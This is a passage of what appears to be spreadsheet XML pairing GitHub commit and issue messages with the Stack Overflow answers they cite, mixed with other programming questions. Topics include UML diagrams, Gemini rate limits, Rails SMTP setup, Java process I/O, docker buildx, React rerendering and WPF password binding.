https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/modeling/uml-class-diagrams-reference
5
:
Association
: A relationship between the members of two classifiers.
5a
:
Aggregation
: An association representing a shared ownership relationship. The
Aggregation
property of the owner role is set to
Shared
.
5b
:
Composition
: An association representing a whole-part relationship. The
Aggregation
property of the owner role is set to
Composite
.
9
:
Generalization
: The specific classifier inherits part of its definition from the general
classifier. The general classifier is at the arrow end of the connector. Attributes, associations, and
operations are inherited by the specific classifier. Use the
Inheritance
tool to create a
generalization between two classifiers.
13
:
Import
: A relationship between packages, indicating that one
package includes all the definitions of another.
14
:
Dependency
: The definition or implementation of the dependent classifier might change if
the classifier at the arrowhead end is changed.
15
:
Realization
: The class implements the operations and attributes defined by the interface.
Use the
Inheritance
tool to create a realization between a class and an interface.
16
:
Realization
: An alternative presentation of the same relationship. The label on the
lollipop symbol identifies the interface.
UML Class Diagrams: Guidelines
:
http://msdn.microsoft.com/library/dd409416%28VS.140%29.aspx
Properties of an Association
Aggregation
: This appears as a diamond shape at one end of the connector. You can use it to
indicate that instances at the aggregating role own or contain instances of the other.
Is Navigable
: If true for only one role, an arrow appears in the navigable direction. You can use
this to indicate navigability of links and database relations in the software.
Generalization
: Generalization means that the specializing or derived type inherits attributes,
operations, and associations of the general or base type. The general type appears at the arrowhead
end of the relationship.
Realization
: Realization means that a class implements the attributes and operations specified by
the interface. The interface is at the arrow end of the connector.
Let me know if you have more questions.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I try to use &lt;code&gt;gemini-1.5-flash&lt;/code&gt;, to process 4 chunk of text, using async way.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def generate_readable_transcript(transcript: str, model: str, converter: OpenCC) -&amp;gt; str:
    readable_transcript = asyncio.run(_generate_readable_transcript(
        transcript = transcript,
        model = model,
        converter = converter
    ))
    return readable_transcript
async def _generate_readable_transcript(transcript: str, model: str, converter: OpenCC) -&amp;gt; str:
    try:
        valid_models = ['gpt-4o-mini', 'gemini-1.5-flash']
        if model not in valid_models:
            raise RuntimeError(f&amp;quot;Unsupported model: {model}.&amp;quot;)
        system_prompt = (
            &amp;quot;You are an assistant that improves the readability of text by adding proper capitalization, &amp;quot;
            &amp;quot;punctuation, and line breaks without adding or removing any words or content.&amp;quot;
        )
        if model == &amp;quot;gemini-1.5-flash&amp;quot;:
            client = AsyncOpenAI(
                base_url=&amp;quot;https://generativelanguage.googleapis.com/v1beta/&amp;quot;,
                api_key=GEMINI_KEY
            )
            # https://firebase.google.com/docs/vertex-ai/gemini-models
            limit = 8192 * 0.9
            gemeni_client = genai.Client(api_key=GEMINI_KEY)
            encoding = None
        else:
            client = AsyncOpenAI(api_key=OPEN_AI_KEY)
            # https://platform.openai.com/docs/models
            limit = 16384 * 0.9
            gemeni_client = None
            encoding = tiktoken.encoding_for_model(model)
        start_time = time.time()
        texts = split_text_by_token_limit(
            text=transcript, 
            limit=limit,
            gemeni_client=gemeni_client,
            encoding=encoding
        )
        end_time = time.time()
        time_ms = (end_time - start_time) * 1000  # Convert to milliseconds
        print(f&amp;quot;Time taken for split_text_by_token_limit: {time_ms:.2f} ms&amp;quot;)
        print(f&amp;quot;{len(texts)} splitted text ðŸ°&amp;quot;)
        # Define an async helper to process one chunk.
        async def process_chunk(idx: int, text: str) -&amp;gt; (int, str):
            user_prompt = (
                f&amp;quot;Please rewrite the following text with proper capitalization, punctuation, and line breaks &amp;quot;
                f&amp;quot;without adding or removing any words or content:\n\n{text}&amp;quot;
            )
            print(f&amp;quot;Chunk {idx} processing... ðŸ°&amp;quot;)
            #if idx == 1:
            #    raise Exception(&amp;quot;Simulated exception in chunk 2&amp;quot;)
            response = await client.chat.completions.create(
                model=model,
                temperature=0,
                response_format={&amp;quot;type&amp;quot;: &amp;quot;text&amp;quot;},
                messages=[
                    {&amp;quot;role&amp;quot;: &amp;quot;system&amp;quot;, &amp;quot;content&amp;quot;: system_prompt},
                    {&amp;quot;role&amp;quot;: &amp;quot;user&amp;quot;, &amp;quot;content&amp;quot;: user_prompt}
                ]
            )
            result = response.choices[0].message.content
            message = f&amp;quot;Chunk {idx} processed ðŸ°&amp;quot;
            print(message)
            return idx, result
        # Launch all chunk processing tasks concurrently.
        tasks = [asyncio.create_task(process_chunk(idx, text))
                 for idx, text in enumerate(texts)]
        try:
            results = await asyncio.gather(*tasks)
        except Exception as e:
            print(f&amp;quot;Exception during chunk processing: {e}&amp;quot;)
            for task in tasks:
                task.cancel()
            return None
        print(f&amp;quot;{len(results)} results ðŸ°&amp;quot;)
        if len(results) != len(texts):
            print(&amp;quot;Chunk processing failed ðŸ¤¡&amp;quot;)
            return None
        # Sort results by index to preserve sequential order.
        results.sort(key=lambda x: x[0])
        response_content = &amp;quot;\n\n&amp;quot;.join(res for idx, res in results)
        response_content = response_content.strip()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, the &lt;code&gt;gemini-1.5-flash&lt;/code&gt; model always give me error&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Exception during chunk processing: Error code: 429 - [{'error':
{'code': 429, 'message': 'Resource has been exhausted (e.g. check
quota).', 'status': 'RESOURCE_EXHAUSTED'}}]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I check my quota. It still look good to me. It seems like I am allowed to make 2000 requests simultaneously.&lt;/p&gt;
&lt;p&gt;May I know, how I can further debug this issue? Thank you.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/eAGFpr5v.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/eAGFpr5v.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C47</t>
  </si>
  <si>
    <t xml:space="preserve">Add users to website #11
We really should make SMTP work. We should ideally be able to add something like this to the application.yml or so to configure SMTP for the app: https://stackoverflow.com/questions/25872389/rails-4-how-to-correctly-configure-smtp-settings-gmail#25872863 </t>
  </si>
  <si>
    <t>You have to set the domain correctly. Currently in the code posted its "mydomain.net". Change it to
gmail.com
if you want to sent it via gmail.
config.action_mailer.smtp_settings = {
  address:              'smtp.gmail.com',
  port:                 587,
  domain:               'gmail.com',
  user_name:            '
[email protected]
',
  password:             'yourpassword',
  authentication:       :plain,
  enable_starttls_auto: true
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found this code online and applied it to my worksheet and it works as long as I hit run. Is there a way to make it run automatically? I'm creating a form for other people to use and they won't know how to hit run. I'm not experienced in coding so I don't know how to adjust it.&lt;/p&gt;
&lt;pre class="lang-vb prettyprint-override"&gt;&lt;code&gt;Sub AutoFitMergedCellRowHeight()
    Dim CurrentRowHeight As Single, MergedCellRgWidth As Single
    Dim CurrCell As Range
    Dim ActiveCellWidth As Single, PossNewRowHeight As Single
    If ActiveCell.MergeCells Then
      With ActiveCell.MergeArea
            If .Rows.Count = 1 And .WrapText = True Then
                Application.ScreenUpdating = False
                CurrentRowHeight = .RowHeight
                ActiveCellWidth = ActiveCell.ColumnWidth
                For Each CurrCell In Selection
                    MergedCellRgWidth = CurrCell.ColumnWidth + MergedCellRgWidth
                Next
                .MergeCells = False
                .Cells(1).ColumnWidth = MergedCellRgWidth
                .EntireRow.AutoFit
                PossNewRowHeight = .RowHeight
                .Cells(1).ColumnWidth = ActiveCellWidth
                .MergeCells = True
                .RowHeight = IIf(CurrentRowHeight &amp;gt; PossNewRowHeight, _
                  CurrentRowHeight, PossNewRowHeight)
            End If
        End With
    End If
Application.ScreenUpdating = True
End Sub
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I applied it and it works but it does not run automatically.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C470</t>
  </si>
  <si>
    <t>Remote logging concept should have a blacklist concept
the remote logging concept should have a blacklist concept that allows to exclude a certain alias or device id from being passed on to the enabled plugins. the benefit would be that no unneeded data is being sent over to other services.
# From:
http://stackoverflow.com/questions/5014632/how-can-i-parse-a-yaml-file-from-a-linux-shell-script</t>
  </si>
  <si>
    <t>My use case may or may not be quite the same as what this original post was asking, but it's definitely similar.
I need to pull in some YAML as bash variables. The YAML will never be more than one level deep.
YAML looks like so:
KEY:                value
ANOTHER_KEY:        another_value
OH_MY_SO_MANY_KEYS: yet_another_value
LAST_KEY:           last_value
Output like-a dis:
KEY="value"
ANOTHER_KEY="another_value"
OH_MY_SO_MANY_KEYS="yet_another_value"
LAST_KEY="last_value"
I achieved the output with this line:
sed -e 's/:[^:\/\/]/="/g;s/$/"/g;s/ *=/=/g' file.yaml &gt; file.sh
s/:[^:\/\/]/="/g
finds
:
and replaces it with
="
, while ignoring
://
(for URLs)
s/$/"/g
appends
"
to the end of each line
s/ *=/=/g
removes all spaces before
=</t>
  </si>
  <si>
    <t xml:space="preserve">I'm ashamed to say it, but I have to. I have not worked with ORM's. I'm really considering NHibernate as it seems to be the most mature product for .Net out there (please correct me if I'm wrong). Now, the thing is that we have a big e-commerce/booking system with an SqlServer as the main integration point, containing quite a lot of business logic in sprocs. Now - obviously - this architecture is something we want to move away from, and we've been doing so for some time, piece by piece. So, my real question is how feasible is it to start using NHibernate for new features and not going back and map all the legacy stuff? Is this kind of gradual introduction of and ORM supported, and if so, would you recommend it?
</t>
  </si>
  <si>
    <t>C471</t>
  </si>
  <si>
    <t>Develop a Static utility library class
This class needs to expose some simple methods that will allow for a user to make a call something like
Command.awsCommand(String name, JSONObject value );
This would call the helper methods make a CLI call to aws and returning a json object with the results.
Here is a sample reference http://stackoverflow.com/questions/3643939/java-process-with-input-output-stream
to start this issue I would like a simple test class that can take a hardcoded value that can be tested and ensure data is being executed properly.
Make sure that there are proper timeouts used so threads don't hang waiting on resources.</t>
  </si>
  <si>
    <t>Firstly, I would recommend replacing the line
Process process = Runtime.getRuntime ().exec ("/bin/bash");
with the lines
ProcessBuilder builder = new ProcessBuilder("/bin/bash");
builder.redirectErrorStream(true);
Process process = builder.start();
ProcessBuilder is new in Java 5 and makes running external processes easier.  In my opinion, its most significant improvement over
Runtime.getRuntime().exec()
is that it allows you to redirect the standard error of the child process into its standard output.  This means you only have one
InputStream
to read from.  Before this, you needed to have two separate Threads, one reading from
stdout
and one reading from
stderr
, to avoid the standard error buffer filling while the standard output buffer was empty (causing the child process to hang), or vice versa.
Next, the loops (of which you have two)
while ((line = reader.readLine ()) != null) {
    System.out.println ("Stdout: " + line);
}
only exit when the
reader
, which reads from the process's standard output, returns end-of-file.  This only happens when the
bash
process exits.  It will not return end-of-file if there happens at present to be no more output from the process.  Instead, it will wait for the next line of output from the process and not return until it has this next line.
Since you're sending two lines of input to the process before reaching this loop, the first of these two loops will hang if the process hasn't exited after these two lines of input.  It will sit there waiting for another line to be read, but there will never be another line for it to read.
I compiled your source code (I'm on Windows at the moment, so I replaced
/bin/bash
with
cmd.exe
, but the principles should be the same), and I found that:
after typing in two lines, the output from the first two commands appears, but then the program hangs,
if I type in, say,
echo test
, and then
exit
, the program makes it out of the first loop since the
cmd.exe
process has exited.  The program then asks for another line of input (which gets ignored), skips straight over the second loop since the child process has already exited, and then exits itself.
if I type in
exit
and then
echo test
, I get an IOException complaining about a pipe being closed.  This is to be expected - the first line of input caused the process to exit, and there's nowhere to send the second line.
I have seen a trick that does something similar to what you seem to want, in a program I used to work on.  This program kept around a number of shells, ran commands in them and read the output from these commands.  The trick used was to always write out a 'magic' line that marks the end of the shell command's output, and use that to determine when the output from the command sent to the shell had finished.
I took your code and I replaced everything after the line that assigns to
writer
with the following loop:
while (scan.hasNext()) {
    String input = scan.nextLine();
    if (input.trim().equals("exit")) {
        // Putting 'exit' amongst the echo --EOF--s below doesn't work.
        writer.write("exit\n");
    } else {
        writer.write("((" + input + ") &amp;&amp; echo --EOF--) || echo --EOF--\n");
    }
    writer.flush();
    line = reader.readLine();
    while (line != null &amp;&amp; ! line.trim().equals("--EOF--")) {
        System.out.println ("Stdout: " + line);
        line = reader.readLine();
    }
    if (line == null) {
        break;
    }
}
After doing this, I could reliably run a few commands and have the output from each come back to me individually.
The two
echo --EOF--
commands in the line sent to the shell are there to ensure that output from the command is terminated with
--EOF--
even in the result of an error from the command.
Of course, this approach has its limitations.  These limitations include:
if I enter a command that waits for user input (e.g. another shell), the program appears to hang,
it assumes that each process run by the shell ends its output with a newline,
it gets a bit confused if the command being run by the shell happens to write out a line
--EOF--
.
bash
reports a syntax error and exits if you enter some text with an unmatched
)
.
These points might not matter to you if whatever it is you're thinking of running as a scheduled task is going to be restricted to a command or a small set of commands which will never behave in such pathological ways.
EDIT
: improve exit handling and other minor changes following running this on Linux.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Imagine I have two groups of endpoints:&lt;/p&gt;
&lt;p&gt;Examples of endpoints in group 1:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;/trip/getAll&lt;/li&gt;
&lt;li&gt;/trip/create&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Examples of endpoints in group 2:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;/startup/get&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For each group of endpoints, I have a separate view model.&lt;/p&gt;
&lt;p&gt;For &lt;code&gt;/trip/*&lt;/code&gt;, I have &lt;code&gt;TripViewModel&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class TripViewModel: ObservableObject {
    let tripService: TripServiceProtocol
    private var cancellables = Set&amp;lt;AnyCancellable&amp;gt;()
    @Published var trips: [Trip] = []
    init(tripService: TripServiceProtocol) {
        self.tripService = tripService
    }
    func fetchAllTrips() {
        tripService.getAllTrips()
            .receive(on: RunLoop.main)
            .sink(receiveCompletion: { data in
                print(&amp;quot;Received \(data)&amp;quot;)
        }, receiveValue: {[weak self] data in
            // Get the trips and update the view model
            self?.trips = data.data?.trips ?? []
        }).store(in: &amp;amp;cancellables)
    }
    func createTrip() {
        // call endpoint to create a trip
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And for &lt;code&gt;/startup/*&lt;/code&gt;, I have &lt;code&gt;StartupViewModel&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class StartupViewModel: ObservableObject {
    let startupService: StartupServiceProtocol
    private var cancellables = Set&amp;lt;AnyCancellable&amp;gt;()
    @Published var trips: [Trip] = []
    init(startupService: StartupServiceProtocol) {
        self.startupService = startupService
    }
    func getStartup() {
        startupService.getStartup()
            .receive(on: RunLoop.main)
            .sink(receiveCompletion: { data in
                print(&amp;quot;Received \(data)&amp;quot;)
        }, receiveValue: {[weak self] data in
            // Get the trips and update the view model
            self?.trips = data.data?.trips ?? []
        }).store(in: &amp;amp;cancellables)
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, I get &lt;code&gt;trips&lt;/code&gt; in both view models.&lt;/p&gt;
&lt;p&gt;Now this is a problem, because when I call &lt;code&gt;getStartup()&lt;/code&gt; in the &lt;code&gt;StartupViewModel&lt;/code&gt;, I want to also update the &lt;code&gt;trips&lt;/code&gt; in the &lt;code&gt;TripViewModel&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;How can this be done? And should it even be done?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C472</t>
  </si>
  <si>
    <t>Fix JSX error https://stackoverflow.com/questions/62702485/component-
cannot-be-used-as-a-jsx-component-its-return-type-element-is-not</t>
  </si>
  <si>
    <t>Add the following code
"paths": {
   "react": [ "./node_modules/@types/react" ]
 }
to
tsconfig.json
file, in compilerOptions
Here is how my code looks like now:
{
  "compilerOptions": {
    "jsx":"react",
    "strict": true,
    "paths": {
      "react": [ "./node_modules/@types/react" ]
    }
  }
}
It is telling the typescript compiler that when it encounters a reference to the "react" module, it should look for the actual implementation in the "./node_modules/@types/react" directory.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm working on a personal project (C# / ASP.NET) that will use LINQ to SQL. The Solution will have (so far) a Webform project, a Namespace project (business logic), and a Tests project. I'm in the very early stages so far (clearly in Design phase).
Is there a paradigm for 3-Tier Architecture here? It seems like the DAL is entirely useless in this case; feels like I should be performing the LINQ query directly from the business logic.  
It also occurs to me that if I just keep one resident DataContext and pass that around, I would only need the one open connection. This would have the added benefit of committing changes all at once instead of granularly. Any thoughts on that?
I found [external-link], but it seems to paint an incomplete picture. Are there any in-depth articles on the subject?
</t>
  </si>
  <si>
    <t>C473</t>
  </si>
  <si>
    <t>Specify both architecture and target os for multi-platform builds
In order to build for both 'amd64' and 'arm64' one needs to specify
'all' architecture and target RPM OS to 'linux'.
Note that it was verified by building the multiplatform docker image
with the following steps:
1. create a multiplatform builder
  docker buildx create --name multi-platform-builder
2. use it for building
  docker buildx use multi-platform-builder
3. bootstrap it
  docker buildx inspect --bootstrap
Building image command looks like:
docker buildx build --platform linux/amd64,linux/arm64 -f Dockerfile --no-cache -t [user]/gerrit:$(git describe)-almalinux8 --push .
Note that multiplatform builder on ubuntu requires an extra steps
that are described here https://stackoverflow.com/a/69492910</t>
  </si>
  <si>
    <t>Tagging on this answer in response to the first error. The commands have been updated per https://docs.docker.com/buildx/working-with-buildx/.
QEMU is a cross-platform emulator responsible for sourcing the binaries for different architectures (through the binfmt_misc handler).
Will save some people some time to start with this command first:
docker run --privileged --rm tonistiigi/binfmt --install all</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using OpenTofu for the deployment of some basic Azure resources. When running &lt;code&gt;tofu init&lt;/code&gt; I get the following error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Initializing the backend...
Initializing provider plugins...
- Finding hashicorp/random versions matching &amp;quot;~&amp;gt; 3.0&amp;quot;...
- Finding latest version of hashicorp/azure...
- Finding hashicorp/azurerm versions matching &amp;quot;~&amp;gt; 4.0&amp;quot;...
- Installing hashicorp/random v3.6.3...
- Installed hashicorp/random v3.6.3 (signed, key ID 0C0AF313E5FD9F80)
- Installing hashicorp/azurerm v4.19.0...
- Installed hashicorp/azurerm v4.19.0 (signed, key ID 0C0AF313E5FD9F80)
Providers are signed by their developers.
If you'd like to know more about provider signing, you can read about it here:
https://opentofu.org/docs/cli/plugins/signing/
â•·
â”‚ Error: Failed to query available provider packages
â”‚ 
â”‚ Could not retrieve the list of available versions for provider hashicorp/azure: provider registry
â”‚ registry.opentofu.org does not have a provider named registry.opentofu.org/hashicorp/azure
â”‚ 
â”‚ All modules should specify their required_providers so that external consumers will get the correct providers when
â”‚ using a module. To see which modules are currently depending on hashicorp/azure, run the following command:
â”‚     tofu providers
â”‚ 
â”‚ If you believe this provider is missing from the registry, please submit a issue on the OpenTofu Registry
â”‚ https://github.com/opentofu/registry/issues/new/choose
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Things I've tried:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;deleting the lock file and running it again&lt;/li&gt;
&lt;li&gt;expressly using the terraform registry as opposed to the OpenTofu one using a &lt;code&gt;.config&lt;/code&gt; and setting the environment variable &lt;code&gt;TF_REGISTRY_DISCOVERY=1&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;updating the &lt;code&gt;azurerm&lt;/code&gt; provider to ~&amp;gt;4.0&lt;/li&gt;
&lt;li&gt;searching for any other references to &lt;code&gt;hashicorps\azure&lt;/code&gt; (there are none)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The output of &lt;code&gt;tofu providers&lt;/code&gt; is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Providers required by configuration:
.
â”œâ”€â”€ provider[registry.opentofu.org/hashicorp/azurerm] ~&amp;gt; 4.0
â”œâ”€â”€ provider[registry.opentofu.org/hashicorp/random] ~&amp;gt; 3.0
â””â”€â”€ provider[registry.opentofu.org/hashicorp/azure]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and this is the contents of my providers file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;terraform {
  required_providers {    
    azurerm = {
      source  = &amp;quot;hashicorp/azurerm&amp;quot;
      version = &amp;quot;~&amp;gt; 3.0&amp;quot;
    }
    random = {
      source  = &amp;quot;hashicorp/random&amp;quot;
      version = &amp;quot;~&amp;gt; 3.0&amp;quot;
    }
  }
}
provider &amp;quot;azurerm&amp;quot; {
  features {
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've exhausted all of ChatGPT's ideas so anything you can think of would be helpful.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C474</t>
  </si>
  <si>
    <t>* Authentication Key domain model (#246)
* User-linked and anonymous Keys (wip)
* StreamService: complex stream authentication
* StreamService: remove circulary dependency
Read more: http://stackoverflow.com/questions/8002951/grails-service-class-cross-ref</t>
  </si>
  <si>
    <t xml:space="preserve">I know this question has been asked a bit before. But looking around I still cant make my mind up which route I should go down. Here's my scenario, hopefully you can help out:
We will have a series of web services that will be hit on a scheduled basis by hundreds of mobile applications. These services will data on the device with new information both going to the devices and coming back from them. The data returned from the devices will need to update a single central SQL server database that also feeds several desktop applications and a website. 
In order to reduce the amount of time for the request/response of these services we have decided to process data coming in from the devices after the fact by either sticking them in an MSMQ instance or storing the serialized objects in a temporary data store and having a windows service process them later. 
So there's my choices, but aside from this here's a few more things that might help you guys advise me:
The data returned from the devices will not be returned in smaller message packets that need to be ordered server side. 
I know nothing about MSMQ but I have written windows services before. Though I have no issue picking up MSMQ if it is required. 
I want to keep the response from the devices some where in case the processing fails for some reason that is caused by the data. This way I can interrogate the data and see if there is a problem i.e. the device allows a user to add comments that extend the related field's length in the server side database.  
With this information, do you think it is worth me looking into learning MSMQ or should I stick with the simpler solution?
Chris. 
</t>
  </si>
  <si>
    <t>C475</t>
  </si>
  <si>
    <t>Workaround to avoid using redux and force component remount without fetching remote api data again. Needed to use external component wrapper and also and setting key property to component to force remount and component whole lyfecycle to run again.
https://stackoverflow.com/questions/30626030/can-you-force-a-react-component-to-rerender-without-calling-setstate</t>
  </si>
  <si>
    <t>In class components, you can call
this.forceUpdate()
to force a rerender.
Documentation:
https://react.dev/reference/react/Component#forceupdate
In function components, there's no equivalent of
forceUpdate
, but you can
contrive a way to force updates with the
useState
hook
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Whenever I create a SvelteKit project using&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;npx sv create my-app
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;there are apparently no Typescript definitions which causes VS Code to underline pretty much my entire code in red. e.g.:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/FGazPoVo.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/FGazPoVo.png" alt="enter image description here" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I am just doing what Svelte has in its &lt;a href="https://svelte.dev/docs/kit/routing#server" rel="nofollow noreferrer"&gt;docs&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Throughout the examples above, weâ€™ve been importing types from a $types.d.ts file. This is a file SvelteKit creates for you in a hidden directory if youâ€™re using TypeScript (or JavaScript with JSDoc type annotations) to give you type safety when working with your root files.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I did find a &lt;code&gt;types.d.ts&lt;/code&gt; file &lt;code&gt;.svelte-kit/types/src/routes/$types.d.ts&lt;/code&gt; in my project root. I have pasted it &lt;a href="https://gist.github.com/siddhsql/172d87132f9dd574e0ce68b7e178c452" rel="nofollow noreferrer"&gt;here&lt;/a&gt;. And my &lt;code&gt;package.json&lt;/code&gt; is pasted &lt;a href="https://gist.github.com/siddhsql/de43a12ba9c459622526884fd3c00582" rel="nofollow noreferrer"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;What can I do to fix this as its just too annoying and happens with all of my SvelteKit projects?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C476</t>
  </si>
  <si>
    <t>Added PasswordBoxHelper to get passwordboxs dependencies to work in c
aliburn.micro as suggested from : https://stackoverflow.com/questions/30631522/caliburn-micro-support-for-passwordbox
added the needed code to initiated function in bootstrapper, for the passwordbox fix linked above.
added in login view and UI/xaml design-code.
added methods for login in LoginViewModels.
Added in ActivateItem for LoginViewModel on ShellViewModel startup.
wired input from LoginView UI to LoginViewModel attributes.</t>
  </si>
  <si>
    <t>I've only been able to get it to work with dependency properties, effectively bypassing the convention binding goodness that Caliburn.Micro supplies. I recognize that's not your ideal, but pragmatically this is the solution I regularly use.  I believe when I hit this snag historically, I found
this post
on StackOverflow that led me in this direction.  For your consideration:
public class BoundPasswordBox
    {
        private static bool _updating = false;
        /// &lt;summary&gt;
        /// BoundPassword Attached Dependency Property
        /// &lt;/summary&gt;
        public static readonly DependencyProperty BoundPasswordProperty =
            DependencyProperty.RegisterAttached("BoundPassword",
                typeof(string),
                typeof(BoundPasswordBox),
                new FrameworkPropertyMetadata(string.Empty, OnBoundPasswordChanged));
        /// &lt;summary&gt;
        /// Gets the BoundPassword property.
        /// &lt;/summary&gt;
        public static string GetBoundPassword(DependencyObject d)
        {
            return (string)d.GetValue(BoundPasswordProperty);
        }
        /// &lt;summary&gt;
        /// Sets the BoundPassword property.
        /// &lt;/summary&gt;
        public static void SetBoundPassword(DependencyObject d, string value)
        {
            d.SetValue(BoundPasswordProperty, value);
        }
        /// &lt;summary&gt;
        /// Handles changes to the BoundPassword property.
        /// &lt;/summary&gt;
        private static void OnBoundPasswordChanged(
            DependencyObject d,
            DependencyPropertyChangedEventArgs e)
        {
            PasswordBox password = d as PasswordBox;
            if (password != null)
            {
                // Disconnect the handler while we're updating.
                password.PasswordChanged -= PasswordChanged;
            }
            if (e.NewValue != null)
            {
                if (!_updating)
                {
                    password.Password = e.NewValue.ToString();
                }
            }
            else 
            {
                password.Password = string.Empty;
            }
            // Now, reconnect the handler.
            password.PasswordChanged += PasswordChanged;
        }
        /// &lt;summary&gt;
        /// Handles the password change event.
        /// &lt;/summary&gt;
        static void PasswordChanged(object sender, RoutedEventArgs e)
        {
            PasswordBox password = sender as PasswordBox;
            _updating = true;
            SetBoundPassword(password, password.Password);
            _updating = false;
        }
    }
Then, in your XAML:
&lt;PasswordBox pwbx:BoundPasswordBox.BoundPassword="{Binding UserPassword, Mode=TwoWay,UpdateSourceTrigger=PropertyChanged,NotifyOnValidationError=True,ValidatesOnDataErrors=True}" /&gt;
and pwbx is found as a namespace on the Window tag:
&lt;Window x:Class="MyProject.Views.LoginView"
             xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
             xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
             xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" 
             xmlns:d="http://schemas.microsoft.com/expression/blend/2008" 
             mc:Ignorable="d" 
             xmlns:pwbx="clr-namespace:MyProject.Client.Controls"&gt;
The ViewModel:
using Caliburn.Micro;
using MyProject.Core;
using MyProject.Repositories;
using MyProject.Types;
using MyProject.ViewModels.Interfaces;
namespace MyProject.ViewModels
{
    public class LoginViewModel : Screen, ILoginViewModel
    {
        private readonly IWindowManager _windowManager;
        private readonly IUnitRepository _unitRepository;
        public bool IsLoginValid { get; set; }
        public Unit LoggedInUnit { get; set; }
        private string _password;
        public string UserPassword
        {
            get { return _password; }
            set
            {
                _password = value;
                NotifyOfPropertyChange(() =&gt; UserPassword);
                NotifyOfPropertyChange(() =&gt; CanLogin);
            }
        }
        private string _name;
        public string Username
        {
            get { return _name; }
            set
            {
                _name = value;
                NotifyOfPropertyChange(() =&gt; Username);
                NotifyOfPropertyChange(() =&gt; CanLogin);
            }
        }
        public LoginViewModel(IWindowManager windowManager,IUnitRepository unitRepository)
        {
            _windowManager = windowManager;
            _unitRepository = unitRepository;
            DisplayName = "MyProject - Login";
            Version = ApplicationVersionRepository.GetVersion();
        }
        public string Version { get; private set; }
        public void Login()
        {
            // Login logic
            var credentials = new UserCredentials { Username = Username, Password=UserPassword };
            var resp = _unitRepository.AuthenticateUnit(credentials);
            if (resp == null) return;
            if (resp.IsValid)
            {
                IsLoginValid = true;
                LoggedInUnit = resp.Unit;
                TryClose();
            }
            else
            {
                var dialog = new MessageBoxViewModel(DialogType.Warning, DialogButton.Ok, "Login Failed", "Login Error: " + resp.InvalidReason);
                _windowManager.ShowDialog(dialog);
            }
        }
        public bool CanLogin
        {
            get
            {
                return !string.IsNullOrEmpty(Username) &amp;&amp; !string.IsNullOrEmpty(UserPassword);
            }
        }
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">I'm in the process up changing a single SQL DB website (ASP.NET/VB.NET) into a multitenant app, where each client has their own database.
In the old site, all the ASP roles, logins and providers pointed to the single database.
Now we have multiple databases, I'm wondering what would the best architecture/techniques to use. There is one database that configures the tenants, such as the company name, various settings (that would normally be in a web.config) and the connection string to their tenant database.
Should we have all the membership &amp; role stuff in the single database that configures the tenants  or do we have membership &amp; roles in each individual tenants database? Option 2 seems tricky because I think ASP.NET only likes one set of RoleProviders defined in the web.config.
Has anyone tried this before or got any recommendations?
</t>
  </si>
  <si>
    <t>C477</t>
  </si>
  <si>
    <t>Added template.xhtml &amp; site.xhtml. I'm trying to learn how to setup a
basic site structure and then include xhtml components like the
login-bar etc. This
(http://stackoverflow.com/questions/4792862/how-to-include-another-xhtml-in-xhtml-using-jsf-2-0-facelets)
seems to be a pretty good explanation of the topic</t>
  </si>
  <si>
    <t>&lt;ui:include&gt;
Most basic way is &lt;ui:include&gt;. The included content must be placed inside &lt;ui:composition&gt;.
Kickoff example of the master page /page.xhtml:
&lt;!DOCTYPE html&gt;
&lt;html lang="en"
    xmlns="http://www.w3.org/1999/xhtml"
    xmlns:f="http://xmlns.jcp.org/jsf/core"
    xmlns:h="http://xmlns.jcp.org/jsf/html"
